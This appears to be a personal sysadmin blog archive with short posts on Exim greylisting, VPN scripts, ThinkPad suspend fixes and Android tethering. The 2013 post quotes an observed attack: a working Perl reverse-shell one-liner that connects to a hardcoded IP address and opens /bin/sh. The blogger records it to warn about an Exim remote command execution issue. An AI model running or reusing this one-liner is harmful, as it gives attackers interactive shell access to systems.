Sunday, May 5, 2013

SMTP: envelope-from address tries to execute perl

earlier today, found this:
(and someone else, too.)
of course, no one wants to execute the downloaded file a.pl:
perl -e 'use Socket;$i="178.218.211.118";$p=9000;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};' 
not sure which MTA is vulnerable, yet.

...in the meantime i found RedTeam Pentesting GmbH has a detailed advisory on the problem: Exim with Dovecot: Typical Misconfiguration Leads to Remote Command Execution - here

Monday, April 30, 2012

Ubuntu Precise on Lenovo Thinkpad X200s

starting from a LTS update to ubuntu precise my X200s ended up with:

legacy resume(): pnp_bus_resume +0x0/0x70 returns -19
PM Device 00:0a failed to resume: error -19 
tpm_tis 00:0a: 1.2 TPM (device-id 0x1020, rev-id 6)
during suspend.

"blacklist tpm_tis" (itpm=1 did not help because the autodetect did this already...) and using the cgroup-lite package instead of the cgroup-bin helped (cf. https://groups.google.com/d/topic/linux.debian.kernel/kxNcotFXps8/discussion, and https://bugs.launchpad.net/ubuntu/+source/libcgroup/+bug/838729).


continuing here [http://vminko.org/gentoo_manuals/thinkpad_x200#hotkeys] i did
 - /not/ require acpi_sleep=s3_bios - quite the opposite: using it broke suspend functionality
 - not try i915.modeset=1 video=1280x800
 - not look into too many other thing (because things seemed to work)


then, adding the dkms version for tp_smapi from here [http://www.thinkwiki.org/wiki/Tp_smapi] so far,
 - i am not using the hdapsd but
 - do use the Battery charge control features 

and installing the power-saving-script-for-pm from here [http://axa-ru.blogspot.com/2009/12/ubuntu-910-thinkpad-x200s-power-saving.html]
 - my X200s is doing well with Ubuntu Precise.

(well, of course, i still had to get rid of much foo to be able to start a X session with ratpoison...)

Thursday, March 1, 2012

personal reminder: Cisco vpn and vpnc

a simple task: use a Cisco configuration (for their own vpn client) but use vpnc...

reading up on Cisco's manual - to understand how the config/their client is configured - seemed like a very good idea:
http://www.cisco.com/en/US/docs/security/vpn_client/cisco_vpn_client/vpn_client46/administration/admin.html


unfortunately, i ended with a variant of this
Error: either “to” is duplicate, or “ipid” is a garbage.


which has ben reported here:
vpnc-script incorrectly parses the output of ip route with kernels >= 2.6.38


and also found a solution here:
where it boils down to

"an old version of vpnc-script. This script is what sets up all the addresses and routes for you. The OpenConnect project provides an updated / revised release of this script. Download the latest copy from here . Replace the vpnc-script script that comes with the Ubuntu vpnc package: /etc/vpnc/vpnc-script."

Friday, October 14, 2011

combining greylisting with spam scores - working exim example

...personal experience with greylisting, some inspiration (some i can't remember anymore...), and some thoughts led to the following (implemented) idea:

let's suppose you trust the system's spam score to the extent that
- a low enough spam score is fairly-certainly correct

why not use a low enough threshold to have first-time senders pass by?
[/etc/exim4/conf.d/acl/40_exim4-config_check_data.rul]

>defer
>  ...
>  log_message = message deferred: probable spam and greylistd 
>  message     = Message temporarily deferred
>  condition   = ${if and \
>                  {\
>                    { >{$spam_score_int}{75}}\
>                    {eq{grey}\
>                      {${readsocket{/var/run/greylistd/socket}\
>                                      {${mask:$sender_host_address/24} \
>                                         $sender_address \
>                                         $local_part@$domain}\
>                                        {5s}{}{}}\
>                      }\
>                    }\
>                  }\
>                }
>  delay       = 4m

Sunday, March 6, 2011

personal reminder: ratpoison and an empty, gray java GUI

"How to un-break graphical Java apps under Ratpoison" suggests wmname to make the JVM believe it runs on a different window manager:
$ wmname LG3D
implies the JVM ran on lg3d (Project Looking Glass - a desktop utilizing 3D aspects in the UI), a non-re-parenting window manager written by Sun; this one is on java's hard-coded list of known non-reparenting window managers.

note for OpenJDK: according to this post "versions of OpenJDK that ship with some operating system distributions—at least Debian (and Ubuntu) and Arch Linux in March and August of 2009, respectively—have had this problem fixed by the vendors."

Friday, March 4, 2011

Manually add account to Google Authenticator - Enter key in Base32 Encoding

wanted to use OpenID with Multi-factor authentication as a Single Sign-On (SSO) for online services; in particular, i wanted to combine a regular password with a One-Time Password namely, a TOTP token.

Google Authenticator supports TOTP, and not only for their own 2-step verification but one can "Manually add" other accounts.

The bridging part from TOTP to OpenID, in my case, comes from Clavid (cf. OTP@Clavid).

Now to the tiny bit of information that might save you quite some minutes: when entering your secret key into these two locations to set-up an account

  • Google Authenticator expects the string to be RFC4648 Base32 encoded
  • Clavid expects the string to be hex encoded

Tuesday, January 4, 2011

personal reminder: rfkill to toggle bluetooth

toggling bluetooth (on a Lenovo ThinkPad X200s / Ubuntu 10.x) via rfkill:
rfkill list
rfkill block 0
rfkill unblock 0

Sunday, November 28, 2010

Online Tasks Service for Thunderbird/Lightning

Thunderbird/Lightning has been working with Google Calendar for a while now [cf. link]. however, Tasks are not supported as can be seen in this thread and also here.

now, is there another service for Tasks available?

for some time i have been using Chandler but with recent developments TB/Lightning+Chandler stopped working (and they haven't quite figured out who's to blame...).

ironically, Yahoo comes to the rescue: following this post and going further here Tasks with Yahoo actually work.

Friday, October 15, 2010

Reverse Tethering an Android Phone via USB

until recently i was stuck with a stock android 1.6 - and USB tethering was somewhat adventurous (Tetherbot was an option, connectbot another... both worked best, i.e. without restrictions, when there was a VPN tunneled 'over' either of them.) 

android 2.2 comes with USB tethering: in 'Wireless & network settings' - just need to turn it on... and a network interface will be 'exposed' via USB, network-manager (e.g. in ubuntu) will show the new device, and go.

now, this set-up can also be used the other way around (i.e. use the computer's internet connection the mobile is connected to). however, android's ConnectivityManager does not recognize this connection in such a way that services like Contacts Sync would get going.

startUsingNetworkFeature() in http://android.git.kernel.org/?p=platform/frameworks/base.git;a=blob;f=services/java/com/android/server/ConnectivityService.java will choke on android.net.NeworkInfo.isAvailable():
D/ConnectivityService( 166): getMobileDataEnabled returning true
D/ConnectivityService( 166): special network not available

...let's see.

Tuesday, August 10, 2010

aptitude or apt-get - only update security updates

two quick possibilities to update security updates only (via apt-get and/or aptitude in debian, ubuntu, ...):
  1. uses a dedicated sources file: http://www.debian-administration.org/articles/241#comment_20
  2. uses a search pattern: http://ubuntuforums.org/showpost.php?p=9161314&postcount=3